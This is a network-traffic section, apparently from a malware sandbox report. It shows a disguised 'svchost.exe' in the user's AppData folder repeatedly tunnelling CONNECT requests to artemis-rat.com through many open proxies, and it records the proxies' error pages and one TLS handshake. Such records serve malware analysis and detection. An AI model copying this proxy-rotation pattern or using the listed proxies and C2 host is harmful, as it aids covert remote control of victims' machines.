3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 33 35 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/">https://artemis-rat.com/</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:35 GMT</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3383	192.168.2.5	60837	47.243.92.199	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.781359911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.091231108 CET	38	IN	HTTP/1.1 200 OK content-length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3384	192.168.2.5	60849	51.89.173.40	20435	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.781626940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.474270105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.474606037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3385	192.168.2.5	55962	154.70.214.105	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.782126904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3386	192.168.2.5	60825	123.57.246.163	8118	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.782485008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.232656956 CET	132	IN	HTTP/1.1 503 Too many open connections Content-Type: text/plain Connection: close Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a Data Ascii: Maximum number of open connections reached.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3387	192.168.2.5	60884	38.162.3.74	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.783052921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.195820093 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3388	192.168.2.5	60843	60.205.132.71	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.784499884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.111804962 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3389	192.168.2.5	60252	157.119.222.22	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.790009022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3390	192.168.2.5	60830	201.13.147.161	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.790010929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3391	192.168.2.5	60864	147.75.34.86	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.790397882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.092363119 CET	65	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Zscaler/6.3
Mar 9, 2024 13:14:36.092679977 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 aa 59 45 77 e2 37 43 f6 ff a1 db 68 be 19 62 ee 70 9d ee 73 f1 c6 98 ce ee 57 07 c1 c4 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheRYEw7ChbpsW*,+0/$#('=<5/artemis-rat.com#.i,7wpn(E6uJ+l0A;lh_TujssX
Mar 9, 2024 13:14:36.401959896 CET	1286	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 ac 8e 90 ff d4 8a 36 46 be d2 21 cf 54 66 89 f6 69 1b d9 c7 37 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eR6F!Tfi7DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:36.402225018 CET	1286	IN	Data Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7 Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5\|0F<Arp'~00tP'S"0*H0G10UUS
Mar 9, 2024 13:14:36.402350903 CET	1286	IN	Data Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?'>#ZB-z6=`9cxN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
Mar 9, 2024 13:14:36.703941107 CET	736	IN	Data Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_\|W&o[Fh7okz7%QhIZ
Mar 9, 2024 13:14:36.705840111 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 7d 83 2a 23 24 7f 05 e4 0f d9 d5 68 9d a5 ea bb f5 ef e1 9e 87 34 dc 97 28 19 b6 72 7b 05 fc 03 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 d4 6e bb b5 f3 6a 44 23 3a 4b f6 82 99 fa 9c 2d c2 6b e5 a1 57 Data Ascii: %! }*#$h4(r{(njD#:K-kWjJ~gW
Mar 9, 2024 13:14:37.008728981 CET	258	IN	Data Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 a9 9d f0 34 4d a0 e2 87 3b ef f0 83 ae 87 70 f7 7d a4 38 93 89 31 ca 5f a8 50 03 9c 75 9a 42 a5 00 71 92 49 09 02 20 2c 58 af a0 e3 9e ef b7 49 a8 91 99 df 93 52 b9 9d ed c4 10 a7 63 07 85 a3 33 df 9b Data Ascii: 4M;p}81_PuBqI ,XIRc31xKh<{k68>KQeF {MZYA*oBYV2e{O_Vx$~J6lvYiLI(3K6"B
Mar 9, 2024 13:14:37.009803057 CET	252	OUT	Data Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 5e b6 cc 6a 7a 0f 2e 35 14 3a 79 79 d5 b1 37 f0 ec 21 6f b9 2d 3e 6f 51 8d 0a 46 f7 cf c6 b2 fd 04 9e ea 82 b9 50 90 f1 3d 11 c1 da 92 cb b6 aa 53 ee 95 b0 a5 86 8c a7 a6 30 08 54 1e e4 28 dd fb cc 47 c8 a1 Data Ascii: ^jz.5:yy7!o->oQFP=S0T(G1e7_{rdlWby6M:4UUF0SqYSnz_YK$z2Hn`=resbha=};DJthFwnYTLe9S
Mar 9, 2024 13:14:37.318003893 CET	1286	IN	Data Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 14 fc 24 3c 2e c8 3d 1a f1 7d 8b db b4 4f b9 97 bf 6e 70 34 2e ac 06 2c 2d 89 22 01 d1 7c 5e a5 fe f9 d9 37 9c fd 25 e6 dc a0 24 ef a0 2d 74 c6 bd ea 23 db c0 ff 44 35 84 1c 7e 74 0a a6 de 9d b4 90 7c 1d 08 Data Ascii: q$<.=}Onp4.,-"\|^7%$-t#D5~t\|9&%_K3^m$c'I6QdaU~vVzqeRY07%WYj]Jii)P]V\|k#p$5:;pj@"=H}[v1
Mar 9, 2024 13:14:37.318038940 CET	1286	IN	Data Raw: 1a c6 28 7a 4a e0 77 31 11 43 fb 59 aa 3d 13 fa fd 5b 37 96 d5 74 a1 64 ab e7 ab 94 7f 3b 6f ba 78 f1 ac c9 26 80 16 4f f8 38 9a b2 95 35 7a 51 52 bd f9 20 e4 91 a6 a0 ce a2 42 22 f9 11 c2 8f 78 cf 10 d5 4f de 3d aa 9e eb 44 16 52 4c 9b e2 00 2c Data Ascii: (zJw1CY=[7td;ox&O85zQR B"xO=DRL,DY/!DwT*dq#mD`vggJ>&$lVT[?]i-?pege6d2"\fOWQ%^~ysdq?r(G,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3392	192.168.2.5	56367	220.121.137.183	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.790410042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3393	192.168.2.5	60848	178.128.113.118	23128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.790633917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.142713070 CET	1286	IN	HTTP/1.1 502 Bad Gateway Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3693 X-Squid-Error: ERR_CONNECT_FAIL 0 Vary: Accept-Language Content-Language: en Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3394	192.168.2.5	56394	62.243.56.95	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.790936947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849189043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3395	192.168.2.5	60859	94.130.94.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.791129112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3396	192.168.2.5	60191	181.209.78.76	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.791860104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3397	192.168.2.5	58776	103.228.244.211	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
